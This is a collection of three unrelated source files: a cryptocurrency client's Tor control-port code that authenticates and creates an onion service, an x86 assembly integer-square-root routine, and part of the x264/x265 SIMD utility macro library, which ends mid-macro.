TorControlConnection::~TorControlConnection()
{
if (b_conn)
bufferevent_free(b_conn);
}
void TorControlConnection::readcb(struct bufferevent *bev, void *ctx)
{
TorControlConnection *self = static_cast<TorControlConnection*>(ctx);
struct evbuffer *input = bufferevent_get_input(bev);
size_t n_read_out = 0;
char *line;
assert(input);
// If there is not a whole line to read, evbuffer_readln returns nullptr
while((line = evbuffer_readln(input, &n_read_out, EVBUFFER_EOL_CRLF)) != nullptr)
{
std::string s(line, n_read_out);
free(line);
if (s.size() < 4) // Short line
continue;
// <status>(-|+| )<data><CRLF>
self->message.code = atoi(s.substr(0,3));
self->message.lines.push_back(s.substr(4));
char ch = s[3]; // '-','+' or ' '
if (ch == ' ') {
// Final line, dispatch reply and clean up
if (self->message.code >= 600) {
// Dispatch async notifications to async handler
// Synchronous and asynchronous messages are never interleaved
self->async_handler(*self, self->message);
} else {
if (!self->reply_handlers.empty()) {
// Invoke reply handler with message
self->reply_handlers.front()(*self, self->message);
self->reply_handlers.pop_front();
} else {
LogPrint(BCLog::TOR, "tor: Received unexpected sync reply %i\n", self->message.code);
}
}
self->message.Clear();
}
}
// Check for size of buffer - protect against memory exhaustion with very long lines
// Do this after evbuffer_readln to make sure all full lines have been
// removed from the buffer. Everything left is an incomplete line.
if (evbuffer_get_length(input) > MAX_LINE_LENGTH) {
LogPrintf("tor: Disconnecting because MAX_LINE_LENGTH exceeded\n");
self->Disconnect();
}
}
void TorControlConnection::eventcb(struct bufferevent *bev, short what, void *ctx)
{
TorControlConnection *self = static_cast<TorControlConnection*>(ctx);
if (what & BEV_EVENT_CONNECTED) {
LogPrint(BCLog::TOR, "tor: Successfully connected!\n");
self->connected(*self);
} else if (what & (BEV_EVENT_EOF|BEV_EVENT_ERROR)) {
if (what & BEV_EVENT_ERROR) {
LogPrint(BCLog::TOR, "tor: Error connecting to Tor control socket\n");
} else {
LogPrint(BCLog::TOR, "tor: End of stream\n");
}
self->Disconnect();
self->disconnected(*self);
}
}
bool TorControlConnection::Connect(const std::string &target, const ConnectionCB& _connected, const ConnectionCB& _disconnected)
{
if (b_conn)
Disconnect();
// Parse target address:port
struct sockaddr_storage connect_to_addr;
int connect_to_addrlen = sizeof(connect_to_addr);
if (evutil_parse_sockaddr_port(target.c_str(),
(struct sockaddr*)&connect_to_addr, &connect_to_addrlen)<0) {
LogPrintf("tor: Error parsing socket address %s\n", target);
return false;
}
// Create a new socket, set up callbacks and enable notification bits
b_conn = bufferevent_socket_new(base, -1, BEV_OPT_CLOSE_ON_FREE);
if (!b_conn)
return false;
bufferevent_setcb(b_conn, TorControlConnection::readcb, nullptr, TorControlConnection::eventcb, this);
bufferevent_enable(b_conn, EV_READ|EV_WRITE);
this->connected = _connected;
this->disconnected = _disconnected;
// Finally, connect to target
if (bufferevent_socket_connect(b_conn, (struct sockaddr*)&connect_to_addr, connect_to_addrlen) < 0) {
LogPrintf("tor: Error connecting to address %s\n", target);
return false;
}
return true;
}
bool TorControlConnection::Disconnect()
{
if (b_conn)
bufferevent_free(b_conn);
b_conn = nullptr;
return true;
}
bool TorControlConnection::Command(const std::string &cmd, const ReplyHandlerCB& reply_handler)
{
if (!b_conn)
return false;
struct evbuffer *buf = bufferevent_get_output(b_conn);
if (!buf)
return false;
evbuffer_add(buf, cmd.data(), cmd.size());
evbuffer_add(buf, "\r\n", 2);
reply_handlers.push_back(reply_handler);
return true;
}
/****** General parsing utilities ********/
/* Split reply line in the form 'AUTH METHODS=...' into a type
* 'AUTH' and arguments 'METHODS=...'.
* Grammar is implicitly defined in https://spec.torproject.org/control-spec by
* the server reply formats for PROTOCOLINFO (S3.21) and AUTHCHALLENGE (S3.24).
*/
static std::pair<std::string,std::string> SplitTorReplyLine(const std::string &s)
{
size_t ptr=0;
std::string type;
while (ptr < s.size() && s[ptr] != ' ') {
type.push_back(s[ptr]);
++ptr;
}
if (ptr < s.size())
++ptr; // skip ' '
return make_pair(type, s.substr(ptr));
}
/** Parse reply arguments in the form 'METHODS=COOKIE,SAFECOOKIE COOKIEFILE=".../control_auth_cookie"'.
* Returns a map of keys to values, or an empty map if there was an error.
* Grammar is implicitly defined in https://spec.torproject.org/control-spec by
* the server reply formats for PROTOCOLINFO (S3.21), AUTHCHALLENGE (S3.24),
* and ADD_ONION (S3.27). See also sections 2.1 and 2.3.
*/
static std::map<std::string,std::string> ParseTorReplyMapping(const std::string &s)
{
std::map<std::string,std::string> mapping;
size_t ptr=0;
while (ptr < s.size()) {
std::string key, value;
while (ptr < s.size() && s[ptr] != '=' && s[ptr] != ' ') {
key.push_back(s[ptr]);
++ptr;
}
if (ptr == s.size()) // unexpected end of line
return std::map<std::string,std::string>();
if (s[ptr] == ' ') // The remaining string is an OptArguments
break;
++ptr; // skip '='
if (ptr < s.size() && s[ptr] == '"') { // Quoted string
++ptr; // skip opening '"'
bool escape_next = false;
while (ptr < s.size() && (escape_next || s[ptr] != '"')) {
// Repeated backslashes must be interpreted as pairs
escape_next = (s[ptr] == '\\' && !escape_next);
value.push_back(s[ptr]);
++ptr;
}
if (ptr == s.size()) // unexpected end of line
return std::map<std::string,std::string>();
++ptr; // skip closing '"'
/**
* Unescape value. Per https://spec.torproject.org/control-spec section 2.1.1:
*
* For future-proofing, controller implementors MAY use the following
* rules to be compatible with buggy Tor implementations and with
* future ones that implement the spec as intended:
*
* Read \n \t \r and \0 ... \377 as C escapes.
* Treat a backslash followed by any other character as that character.
*/
std::string escaped_value;
for (size_t i = 0; i < value.size(); ++i) {
if (value[i] == '\\') {
// This will always be valid, because if the QuotedString
// ended in an odd number of backslashes, then the parser
// would already have returned above, due to a missing
// terminating double-quote.
++i;
if (value[i] == 'n') {
escaped_value.push_back('\n');
} else if (value[i] == 't') {
escaped_value.push_back('\t');
} else if (value[i] == 'r') {
escaped_value.push_back('\r');
} else if ('0' <= value[i] && value[i] <= '7') {
size_t j;
// Octal escape sequences have a limit of three octal digits,
// but terminate at the first character that is not a valid
// octal digit if encountered sooner.
for (j = 1; j < 3 && (i+j) < value.size() && '0' <= value[i+j] && value[i+j] <= '7'; ++j) {}
// Tor restricts first digit to 0-3 for three-digit octals.
// A leading digit of 4-7 would therefore be interpreted as
// a two-digit octal.
if (j == 3 && value[i] > '3') {
j--;
}
escaped_value.push_back(strtol(value.substr(i, j).c_str(), nullptr, 8));
// Account for automatic incrementing at loop end
i += j - 1;
} else {
escaped_value.push_back(value[i]);
}
} else {
escaped_value.push_back(value[i]);
}
}
value = escaped_value;
} else { // Unquoted value. Note that values can contain '=' at will, just no spaces
while (ptr < s.size() && s[ptr] != ' ') {
value.push_back(s[ptr]);
++ptr;
}
}
if (ptr < s.size() && s[ptr] == ' ')
++ptr; // skip ' ' after key=value
mapping[key] = value;
}
return mapping;
}
/** Read full contents of a file and return them in a std::string.
* Returns a pair <status, string>.
* If an error occurred, status will be false, otherwise status will be true and the data will be returned in string.
*
* @param maxsize Puts a maximum size limit on the file that is read. If the file is larger than this, truncated data
* (with len > maxsize) will be returned.
*/
static std::pair<bool,std::string> ReadBinaryFile(const fs::path &filename, size_t maxsize=std::numeric_limits<size_t>::max())
{
FILE *f = fsbridge::fopen(filename, "rb");
if (f == nullptr)
return std::make_pair(false,"");
std::string retval;
char buffer[128];
size_t n;
while ((n=fread(buffer, 1, sizeof(buffer), f)) > 0) {
// Check for reading errors so we don't return any data if we couldn't
// read the entire file (or up to maxsize)
if (ferror(f)) {
fclose(f);
return std::make_pair(false,"");
}
retval.append(buffer, buffer+n);
if (retval.size() > maxsize)
break;
}
fclose(f);
return std::make_pair(true,retval);
}
/** Write contents of std::string to a file.
* @return true on success.
*/
static bool WriteBinaryFile(const fs::path &filename, const std::string &data)
{
FILE *f = fsbridge::fopen(filename, "wb");
if (f == nullptr)
return false;
if (fwrite(data.data(), 1, data.size(), f) != data.size()) {
fclose(f);
return false;
}
fclose(f);
return true;
}
/****** Toschain specific TorController implementation ********/
/** Controller that connects to Tor control socket, authenticate, then create
* and maintain an ephemeral hidden service.
*/
class TorController
{
public:
TorController(struct event_base* base, const std::string& target);
~TorController();
/** Get name fo file to store private key in */
fs::path GetPrivateKeyFile();
/** Reconnect, after getting disconnected */
void Reconnect();
private:
struct event_base* base;
std::string target;
TorControlConnection conn;
std::string private_key;
std::string service_id;
bool reconnect;
struct event *reconnect_ev;
float reconnect_timeout;
CService service;
/** Cookie for SAFECOOKIE auth */
std::vector<uint8_t> cookie;
/** ClientNonce for SAFECOOKIE auth */
std::vector<uint8_t> clientNonce;
/** Callback for ADD_ONION result */
void add_onion_cb(TorControlConnection& conn, const TorControlReply& reply);
/** Callback for AUTHENTICATE result */
void auth_cb(TorControlConnection& conn, const TorControlReply& reply);
/** Callback for AUTHCHALLENGE result */
void authchallenge_cb(TorControlConnection& conn, const TorControlReply& reply);
/** Callback for PROTOCOLINFO result */
void protocolinfo_cb(TorControlConnection& conn, const TorControlReply& reply);
/** Callback after successful connection */
void connected_cb(TorControlConnection& conn);
/** Callback after connection lost or failed connection attempt */
void disconnected_cb(TorControlConnection& conn);
/** Callback for reconnect timer */
static void reconnect_cb(evutil_socket_t fd, short what, void *arg);
};
TorController::TorController(struct event_base* _base, const std::string& _target):
base(_base),
target(_target), conn(base), reconnect(true), reconnect_ev(0),
reconnect_timeout(RECONNECT_TIMEOUT_START)
{
reconnect_ev = event_new(base, -1, 0, reconnect_cb, this);
if (!reconnect_ev)
LogPrintf("tor: Failed to create event for reconnection: out of memory?\n");
// Start connection attempts immediately
if (!conn.Connect(_target, boost::bind(&TorController::connected_cb, this, _1),
boost::bind(&TorController::disconnected_cb, this, _1) )) {
LogPrintf("tor: Initiating connection to Tor control port %s failed\n", _target);
}
// Read service private key if cached
std::pair<bool,std::string> pkf = ReadBinaryFile(GetPrivateKeyFile());
if (pkf.first) {
LogPrint(BCLog::TOR, "tor: Reading cached private key from %s\n", GetPrivateKeyFile().string());
private_key = pkf.second;
}
}
TorController::~TorController()
{
if (reconnect_ev) {
event_free(reconnect_ev);
reconnect_ev = nullptr;
}
if (service.IsValid()) {
RemoveLocal(service);
}
}
void TorController::add_onion_cb(TorControlConnection& _conn, const TorControlReply& reply)
{
if (reply.code == 250) {
LogPrint(BCLog::TOR, "tor: ADD_ONION successful\n");
for (const std::string &s : reply.lines) {
std::map<std::string,std::string> m = ParseTorReplyMapping(s);
std::map<std::string,std::string>::iterator i;
if ((i = m.find("ServiceID")) != m.end())
service_id = i->second;
if ((i = m.find("PrivateKey")) != m.end())
private_key = i->second;
}
if (service_id.empty()) {
LogPrintf("tor: Error parsing ADD_ONION parameters:\n");
for (const std::string &s : reply.lines) {
LogPrintf(" %s\n", SanitizeString(s));
}
return;
}
service = LookupNumeric(std::string(service_id+".onion").c_str(), GetListenPort());
LogPrintf("tor: Got service ID %s, advertising service %s\n", service_id, service.ToString());
if (WriteBinaryFile(GetPrivateKeyFile(), private_key)) {
LogPrint(BCLog::TOR, "tor: Cached service private key to %s\n", GetPrivateKeyFile().string());
} else {
LogPrintf("tor: Error writing service private key to %s\n", GetPrivateKeyFile().string());
}
AddLocal(service, LOCAL_MANUAL);
// ... onion requested - keep connection open
} else if (reply.code == 510) { // 510 Unrecognized command
LogPrintf("tor: Add onion failed with unrecognized command (You probably need to upgrade Tor)\n");
} else {
LogPrintf("tor: Add onion failed; error code %d\n", reply.code);
}
}
void TorController::auth_cb(TorControlConnection& _conn, const TorControlReply& reply)
{
if (reply.code == 250) {
LogPrint(BCLog::TOR, "tor: Authentication successful\n");
// Now that we know Tor is running setup the proxy for onion addresses
// if -onion isn't set to something else.
if (gArgs.GetArg("-onion", "") == "") {
CService resolved(LookupNumeric("127.0.0.1", 9050));
proxyType addrOnion = proxyType(resolved, true);
SetProxy(NET_TOR, addrOnion);
SetLimited(NET_TOR, false);
}
// Finally - now create the service
if (private_key.empty()) // No private key, generate one
private_key = "NEW:RSA1024"; // Explicitly request RSA1024 - see issue #9214
// Request hidden service, redirect port.
// Note that the 'virtual' port doesn't have to be the same as our internal port, but this is just a convenient
// choice. TODO; refactor the shutdown sequence some day.
_conn.Command(strprintf("ADD_ONION %s Port=%i,127.0.0.1:%i", private_key, GetListenPort(), GetListenPort()),
boost::bind(&TorController::add_onion_cb, this, _1, _2));
} else {
LogPrintf("tor: Authentication failed\n");
}
}
/** Compute Tor SAFECOOKIE response.
*
* ServerHash is computed as:
* HMAC-SHA256("Tor safe cookie authentication server-to-controller hash",
* CookieString | ClientNonce | ServerNonce)
* (with the HMAC key as its first argument)
*
* After a controller sends a successful AUTHCHALLENGE command, the
* next command sent on the connection must be an AUTHENTICATE command,
* and the only authentication string which that AUTHENTICATE command
* will accept is:
*
* HMAC-SHA256("Tor safe cookie authentication controller-to-server hash",
* CookieString | ClientNonce | ServerNonce)
*
*/
static std::vector<uint8_t> ComputeResponse(const std::string &key, const std::vector<uint8_t> &cookie, const std::vector<uint8_t> &clientNonce, const std::vector<uint8_t> &serverNonce)
{
CHMAC_SHA256 computeHash((const uint8_t*)key.data(), key.size());
std::vector<uint8_t> computedHash(CHMAC_SHA256::OUTPUT_SIZE, 0);
computeHash.Write(cookie.data(), cookie.size());
computeHash.Write(clientNonce.data(), clientNonce.size());
computeHash.Write(serverNonce.data(), serverNonce.size());
computeHash.Finalize(computedHash.data());
return computedHash;
}
void TorController::authchallenge_cb(TorControlConnection& _conn, const TorControlReply& reply)
{
if (reply.code == 250) {
LogPrint(BCLog::TOR, "tor: SAFECOOKIE authentication challenge successful\n");
std::pair<std::string,std::string> l = SplitTorReplyLine(reply.lines[0]);
if (l.first == "AUTHCHALLENGE") {
std::map<std::string,std::string> m = ParseTorReplyMapping(l.second);
if (m.empty()) {
LogPrintf("tor: Error parsing AUTHCHALLENGE parameters: %s\n", SanitizeString(l.second));
return;
}
std::vector<uint8_t> serverHash = ParseHex(m["SERVERHASH"]);
std::vector<uint8_t> serverNonce = ParseHex(m["SERVERNONCE"]);
LogPrint(BCLog::TOR, "tor: AUTHCHALLENGE ServerHash %s ServerNonce %s\n", HexStr(serverHash), HexStr(serverNonce));
if (serverNonce.size() != 32) {
LogPrintf("tor: ServerNonce is not 32 bytes, as required by spec\n");
return;
}
std::vector<uint8_t> computedServerHash = ComputeResponse(TOR_SAFE_SERVERKEY, cookie, clientNonce, serverNonce);
if (computedServerHash != serverHash) {
LogPrintf("tor: ServerHash %s does not match expected ServerHash %s\n", HexStr(serverHash), HexStr(computedServerHash));
return;
}
std::vector<uint8_t> computedClientHash = ComputeResponse(TOR_SAFE_CLIENTKEY, cookie, clientNonce, serverNonce);
_conn.Command("AUTHENTICATE " + HexStr(computedClientHash), boost::bind(&TorController::auth_cb, this, _1, _2));
} else {
LogPrintf("tor: Invalid reply to AUTHCHALLENGE\n");
}
} else {
LogPrintf("tor: SAFECOOKIE authentication challenge failed\n");
}
}
void TorController::protocolinfo_cb(TorControlConnection& _conn, const TorControlReply& reply)
{
if (reply.code == 250) {
std::set<std::string> methods;
std::string cookiefile;
/*
* 250-AUTH METHODS=COOKIE,SAFECOOKIE COOKIEFILE="/home/x/.tor/control_auth_cookie"
* 250-AUTH METHODS=NULL
* 250-AUTH METHODS=HASHEDPASSWORD
*/
for (const std::string &s : reply.lines) {
std::pair<std::string,std::string> l = SplitTorReplyLine(s);
if (l.first == "AUTH") {
std::map<std::string,std::string> m = ParseTorReplyMapping(l.second);
std::map<std::string,std::string>::iterator i;
if ((i = m.find("METHODS")) != m.end())
boost::split(methods, i->second, boost::is_any_of(","));
if ((i = m.find("COOKIEFILE")) != m.end())
cookiefile = i->second;
} else if (l.first == "VERSION") {
std::map<std::string,std::string> m = ParseTorReplyMapping(l.second);
std::map<std::string,std::string>::iterator i;
if ((i = m.find("Tor")) != m.end()) {
LogPrint(BCLog::TOR, "tor: Connected to Tor version %s\n", i->second);
}
}
}
for (const std::string &s : methods) {
LogPrint(BCLog::TOR, "tor: Supported authentication method: %s\n", s);
}
// Prefer NULL, otherwise SAFECOOKIE. If a password is provided, use HASHEDPASSWORD
/* Authentication:
* cookie: hex-encoded ~/.tor/control_auth_cookie
* password: "password"
*/
std::string torpassword = gArgs.GetArg("-torpassword", "");
if (!torpassword.empty()) {
if (methods.count("HASHEDPASSWORD")) {
LogPrint(BCLog::TOR, "tor: Using HASHEDPASSWORD authentication\n");
boost::replace_all(torpassword, "\"", "\\\"");
_conn.Command("AUTHENTICATE \"" + torpassword + "\"", boost::bind(&TorController::auth_cb, this, _1, _2));
} else {
LogPrintf("tor: Password provided with -torpassword, but HASHEDPASSWORD authentication is not available\n");
}
} else if (methods.count("NULL")) {
LogPrint(BCLog::TOR, "tor: Using NULL authentication\n");
_conn.Command("AUTHENTICATE", boost::bind(&TorController::auth_cb, this, _1, _2));
} else if (methods.count("SAFECOOKIE")) {
// Cookie: hexdump -e '32/1 "%02x""\n"' ~/.tor/control_auth_cookie
LogPrint(BCLog::TOR, "tor: Using SAFECOOKIE authentication, reading cookie authentication from %s\n", cookiefile);
std::pair<bool,std::string> status_cookie = ReadBinaryFile(cookiefile, TOR_COOKIE_SIZE);
if (status_cookie.first && status_cookie.second.size() == TOR_COOKIE_SIZE) {
// _conn.Command("AUTHENTICATE " + HexStr(status_cookie.second), boost::bind(&TorController::auth_cb, this, _1, _2));
cookie = std::vector<uint8_t>(status_cookie.second.begin(), status_cookie.second.end());
clientNonce = std::vector<uint8_t>(TOR_NONCE_SIZE, 0);
GetRandBytes(clientNonce.data(), TOR_NONCE_SIZE);
_conn.Command("AUTHCHALLENGE SAFECOOKIE " + HexStr(clientNonce), boost::bind(&TorController::authchallenge_cb, this, _1, _2));
} else {
if (status_cookie.first) {
LogPrintf("tor: Authentication cookie %s is not exactly %i bytes, as is required by the spec\n", cookiefile, TOR_COOKIE_SIZE);
} else {
LogPrintf("tor: Authentication cookie %s could not be opened (check permissions)\n", cookiefile);
}
}
} else if (methods.count("HASHEDPASSWORD")) {
LogPrintf("tor: The only supported authentication mechanism left is password, but no password provided with -torpassword\n");
} else {
LogPrintf("tor: No supported authentication method\n");
}
} else {
LogPrintf("tor: Requesting protocol info failed\n");
}
}
void TorController::connected_cb(TorControlConnection& _conn)
{
reconnect_timeout = RECONNECT_TIMEOUT_START;
// First send a PROTOCOLINFO command to figure out what authentication is expected
if (!_conn.Command("PROTOCOLINFO 1", boost::bind(&TorController::protocolinfo_cb, this, _1, _2)))
LogPrintf("tor: Error sending initial protocolinfo command\n");
}
void TorController::disconnected_cb(TorControlConnection& _conn)
{
// Stop advertising service when disconnected
if (service.IsValid())
RemoveLocal(service);
service = CService();
if (!reconnect)
return;
LogPrint(BCLog::TOR, "tor: Not connected to Tor control port %s, trying to reconnect\n", target);
// Single-shot timer for reconnect. Use exponential backoff.
struct timeval time = MillisToTimeval(int64_t(reconnect_timeout * 1000.0));
if (reconnect_ev)
event_add(reconnect_ev, &time);
reconnect_timeout *= RECONNECT_TIMEOUT_EXP;
}
void TorController::Reconnect()
{
/* Try to reconnect and reestablish if we get booted - for example, Tor
* may be restarting.
*/
if (!conn.Connect(target, boost::bind(&TorController::connected_cb, this, _1),
boost::bind(&TorController::disconnected_cb, this, _1) )) {
LogPrintf("tor: Re-initiating connection to Tor control port %s failed\n", target);
}
}
fs::path TorController::GetPrivateKeyFile()
{
return GetDataDir() / "onion_private_key";
}
void TorController::reconnect_cb(evutil_socket_t fd, short what, void *arg)
{
TorController *self = static_cast<TorController*>(arg);
self->Reconnect();
}
/****** Thread ********/
static struct event_base *gBase;
static std::thread torControlThread;
static void TorControlThread()
{
TorController ctrl(gBase, gArgs.GetArg("-torcontrol", DEFAULT_TOR_CONTROL));
event_base_dispatch(gBase);
}
void StartTorControl()
{
assert(!gBase);
#ifdef WIN32
evthread_use_windows_threads();
#else
evthread_use_pthreads();
#endif
gBase = event_base_new();
if (!gBase) {
LogPrintf("tor: Unable to create event_base\n");
return;
}
torControlThread = std::thread(std::bind(&TraceThread<void (*)()>, "torcontrol", &TorControlThread));
}
void InterruptTorControl()
{
if (gBase) {
LogPrintf("tor: Thread interrupt\n");
event_base_loopbreak(gBase);
}
}
void StopTorControl()
{
if (gBase) {
torControlThread.join();
event_base_free(gBase);
gBase = nullptr;
}
}
|
; INTEGER SQUARE ROOT
;
; file: intsqrt.asm
;
; Author: Matthew Sprigg
;
; Description: Calculates the integer square root
; of a number rounded down. This is useful for
; certain algorithms where an integer does not
; exceed the square root of a certain number
; because it takes far fewer bytes than other
; square root algorithms such as the babylonian
; method.
;
; Example: 16 - 1 - 3 - 5 - 7 = 0
;
; There are four odd subtractors, thus the root is zero.
;
;Ex 2: 4 - 1 - 3 = 0;
;
; Root = 2.
;
;Ex 3: 12 - 1 - 3 - 5 - 7 = -4
;
; Less than zero, therefore 12 is not an even square.
; The square root is between 3 and 4.
; The integer square root is 3.
%include "asm_io.inc"
;--------------------------------------------------------
; initialized data is put in the .data segment
;
segment .data
;--------------------------------------------------------
; uninitialized data is put in the .bss segment
;
segment .bss
;--------------------------------------------------------
; code is put in the .text segment
;
segment .text
global intsqrt ; make accessable to other modules.
;--------------------------------------------------------
; FUNCTIONS / SUBPROGRAMS ;
;--------------------------------------------------------
intsqrt:
;
; int intsqrt(int n) {
;
; int counter = 0;
; int subtractor = 1;
;
; while (n > 0) {
; n -= subtractor;
; subtractor+=2
; counter++
; }
;
; return counter;
;}
;--------------------------------------------------------
; PROLOGUE ;
;--------------------------------------------------------
; VAR TABLE
; ==============================
; Data | Pointer | Pseudocode
; ------------------------------
; local 1 @ [ebp-4] <-- counter
; local 2 @ [ebx] <-- subtractor
; sav EBP @ [ebp]
; retaddr @ [ebp+4]
; param 1 @ [ebp+8] <-- n
push ebp ; save original ebp val on stack.
mov ebp, esp ; new EBP = ESP
sub esp, 4 ; Local vars need 2 dwords.
push ebx ; Preserve ebx.
mov dword [ebp-4], 0 ; counter = 0;
;mov dword [ebp-8], 1 ; subtractor = 1;
mov ebx, 1 ; subtractor = 1;
; arithmatic instructions such as sub cannot
; operate on two memory locations.
;--------------------------------------------------------
; CODE ;
;--------------------------------------------------------
do_while: ; (n > 0)
sub [ebp+8], ebx ; n -= subtractor;
add ebx, 2 ; subtractor += 2;
inc dword [ebp-4] ; counter++;
cmp dword [ebp+8], 0 ; if (n <= 0) break;
jg do_while
setne bl
movzx ebx, bl
mov eax, [ebp-4]
sub eax, ebx
; Because the integer square root is one less than the result
; in counter UNLESS the result is zero, it is necessary
; to have two possible results from the single var counter.
; SETNE removes the need for branches and takes fewer bytes.
;--------------------------------------------------------
; EPILOGUE ;
;--------------------------------------------------------
pop ebx ; restore ebx
add esp, 4 ; clean up local vars.
pop ebp ; restore ebp.
ret ; return.
|
;*****************************************************************************
;* x86util.asm: x86 utility macros
;*****************************************************************************
;* Copyright (C) 2003-2013 x264 project
;* Copyright (C) 2013-2017 MulticoreWare, Inc
;*
;* Authors: Holger Lubitz <holger@lubitz.org>
;* Loren Merritt <lorenm@u.washington.edu>
;* Min Chen <chenm003@163.com>
;*
;* This program is free software; you can redistribute it and/or modify
;* it under the terms of the GNU General Public License as published by
;* the Free Software Foundation; either version 2 of the License, or
;* (at your option) any later version.
;*
;* This program is distributed in the hope that it will be useful,
;* but WITHOUT ANY WARRANTY; without even the implied warranty of
;* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
;* GNU General Public License for more details.
;*
;* You should have received a copy of the GNU General Public License
;* along with this program; if not, write to the Free Software
;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02111, USA.
;*
;* This program is also available under a commercial proprietary license.
;* For more information, contact us at license @ x265.com.
;*****************************************************************************
%assign FENC_STRIDE 64
%assign FDEC_STRIDE 32
%assign SIZEOF_PIXEL 1
%assign SIZEOF_DCTCOEF 2
%define pixel byte
%define vpbroadcastdct vpbroadcastw
%define vpbroadcastpix vpbroadcastb
%if HIGH_BIT_DEPTH
%assign SIZEOF_PIXEL 2
%assign SIZEOF_DCTCOEF 4
%define pixel word
%define vpbroadcastdct vpbroadcastd
%define vpbroadcastpix vpbroadcastw
%endif
%assign FENC_STRIDEB SIZEOF_PIXEL*FENC_STRIDE
%assign FDEC_STRIDEB SIZEOF_PIXEL*FDEC_STRIDE
%assign PIXEL_MAX ((1 << BIT_DEPTH)-1)
%macro FIX_STRIDES 1-*
%if HIGH_BIT_DEPTH
%rep %0
add %1, %1
%rotate 1
%endrep
%endif
%endmacro
%macro SBUTTERFLY 4
%ifidn %1, dqqq
vperm2i128 m%4, m%2, m%3, q0301 ; punpckh
vinserti128 m%2, m%2, xm%3, 1 ; punpckl
%elif avx_enabled && mmsize >= 16
punpckh%1 m%4, m%2, m%3
punpckl%1 m%2, m%3
%else
mova m%4, m%2
punpckl%1 m%2, m%3
punpckh%1 m%4, m%3
%endif
SWAP %3, %4
%endmacro
%macro SBUTTERFLY2 4
punpckl%1 m%4, m%2, m%3
punpckh%1 m%2, m%2, m%3
SWAP %2, %4, %3
%endmacro
%macro TRANSPOSE4x4W 5
SBUTTERFLY wd, %1, %2, %5
SBUTTERFLY wd, %3, %4, %5
SBUTTERFLY dq, %1, %3, %5
SBUTTERFLY dq, %2, %4, %5
SWAP %2, %3
%endmacro
%macro TRANSPOSE2x4x4W 5
SBUTTERFLY wd, %1, %2, %5
SBUTTERFLY wd, %3, %4, %5
SBUTTERFLY dq, %1, %3, %5
SBUTTERFLY dq, %2, %4, %5
SBUTTERFLY qdq, %1, %2, %5
SBUTTERFLY qdq, %3, %4, %5
%endmacro
%macro TRANSPOSE4x4D 5
SBUTTERFLY dq, %1, %2, %5
SBUTTERFLY dq, %3, %4, %5
SBUTTERFLY qdq, %1, %3, %5
SBUTTERFLY qdq, %2, %4, %5
SWAP %2, %3
%endmacro
%macro TRANSPOSE8x8W 9-11
%if ARCH_X86_64
SBUTTERFLY wd, %1, %2, %9
SBUTTERFLY wd, %3, %4, %9
SBUTTERFLY wd, %5, %6, %9
SBUTTERFLY wd, %7, %8, %9
SBUTTERFLY dq, %1, %3, %9
SBUTTERFLY dq, %2, %4, %9
SBUTTERFLY dq, %5, %7, %9
SBUTTERFLY dq, %6, %8, %9
SBUTTERFLY qdq, %1, %5, %9
SBUTTERFLY qdq, %2, %6, %9
SBUTTERFLY qdq, %3, %7, %9
SBUTTERFLY qdq, %4, %8, %9
SWAP %2, %5
SWAP %4, %7
%else
; in: m0..m7, unless %11 in which case m6 is in %9
; out: m0..m7, unless %11 in which case m4 is in %10
; spills into %9 and %10
%if %0<11
movdqa %9, m%7
%endif
SBUTTERFLY wd, %1, %2, %7
movdqa %10, m%2
movdqa m%7, %9
SBUTTERFLY wd, %3, %4, %2
SBUTTERFLY wd, %5, %6, %2
SBUTTERFLY wd, %7, %8, %2
SBUTTERFLY dq, %1, %3, %2
movdqa %9, m%3
movdqa m%2, %10
SBUTTERFLY dq, %2, %4, %3
SBUTTERFLY dq, %5, %7, %3
SBUTTERFLY dq, %6, %8, %3
SBUTTERFLY qdq, %1, %5, %3
SBUTTERFLY qdq, %2, %6, %3
movdqa %10, m%2
movdqa m%3, %9
SBUTTERFLY qdq, %3, %7, %2
SBUTTERFLY qdq, %4, %8, %2
SWAP %2, %5
SWAP %4, %7
%if %0<11
movdqa m%5, %10
%endif
%endif
%endmacro
%macro WIDEN_SXWD 2
punpckhwd m%2, m%1
psrad m%2, 16
%if cpuflag(sse4)
pmovsxwd m%1, m%1
%else
punpcklwd m%1, m%1
psrad m%1, 16
%endif
%endmacro
%macro ABSW 2-3 ; dst, src, tmp (tmp used only if dst==src)
%if cpuflag(ssse3)
pabsw %1, %2
%elifidn %3, sign ; version for pairing with PSIGNW: modifies src
pxor %1, %1
pcmpgtw %1, %2
pxor %2, %1
psubw %2, %1
SWAP %1, %2
%elifidn %1, %2
pxor %3, %3
psubw %3, %1
pmaxsw %1, %3
%elifid %2
pxor %1, %1
psubw %1, %2
pmaxsw %1, %2
%elif %0 == 2
pxor %1, %1
psubw %1, %2
pmaxsw %1, %2
%else
mova %1, %2
pxor %3, %3
psubw %3, %1
pmaxsw %1, %3
%endif
%endmacro
%macro ABSW2 6 ; dst1, dst2, src1, src2, tmp, tmp
%if cpuflag(ssse3)
pabsw %1, %3
pabsw %2, %4
%elifidn %1, %3
pxor %5, %5
pxor %6, %6
psubw %5, %1
psubw %6, %2
pmaxsw %1, %5
pmaxsw %2, %6
%else
pxor %1, %1
pxor %2, %2
psubw %1, %3
psubw %2, %4
pmaxsw %1, %3
pmaxsw %2, %4
%endif
%endmacro
%macro ABSB 2
%if cpuflag(ssse3)
pabsb %1, %1
%else
pxor %2, %2
psubb %2, %1
pminub %1, %2
%endif
%endmacro
%macro ABSD 2-3
%if cpuflag(ssse3)
pabsd %1, %2
%else
%define %%s %2
%if %0 == 3
mova %3, %2
%define %%s %3
%endif
pxor %1, %1
pcmpgtd %1, %%s
pxor %%s, %1
psubd %%s, %1
SWAP %1, %%s
%endif
%endmacro
%macro PSIGN 3-4
%if cpuflag(ssse3) && %0 == 4
psign%1 %2, %3, %4
%elif cpuflag(ssse3)
psign%1 %2, %3
%elif %0 == 4
pxor %2, %3, %4
psub%1 %2, %4
%else
pxor %2, %3
psub%1 %2, %3
%endif
%endmacro
%define PSIGNW PSIGN w,
%define PSIGND PSIGN d,
%macro SPLATB_LOAD 3
%if cpuflag(ssse3)
movd %1, [%2-3]
pshufb %1, %3
%else
movd %1, [%2-3] ;to avoid crossing a cacheline
punpcklbw %1, %1
SPLATW %1, %1, 3
%endif
%endmacro
%imacro SPLATW 2-3 0
%if cpuflag(avx2) && %3 == 0
vpbroadcastw %1, %2
%else
PSHUFLW %1, %2, (%3)*q1111
%if mmsize == 16
punpcklqdq %1, %1
%endif
%endif
%endmacro
%imacro SPLATD 2-3 0
%if mmsize == 16
